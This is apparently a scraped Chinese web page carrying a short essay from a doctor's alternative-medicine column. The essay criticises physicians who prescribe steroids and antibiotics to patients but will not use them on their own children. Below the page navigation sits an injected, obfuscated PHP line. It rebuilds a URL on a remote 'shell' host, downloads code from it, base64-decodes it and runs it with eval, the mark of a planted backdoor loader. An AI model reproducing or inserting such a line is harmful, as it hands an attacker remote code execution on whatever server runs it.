收藏本站
首頁 arrow 劉醫師另類醫學觀念篇 arrow 己所不欲,勿施於人
己所不欲,勿施於人 列印 E-mail
        通常醫師在醫學上研究一種新的治療方式時,多半經由動物→人體實驗,在完全清楚其學理根據、並確定對「大部份」的人有效之後,也許只在患者身上看到一點點副作用,他就不敢用在自己身上。

所以臨床上,我常碰到醫師用了許多類固醇、抗生素在患者身上,但自己的孩子生病了卻不願意用,這種方式是錯誤的,也是我不能苟同的!

一則因類固醇和抗生素在適當的時機,以正確的種類與劑量,對病情的確有很大的幫助,二則「己所不欲,怎施於人」哪!
 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));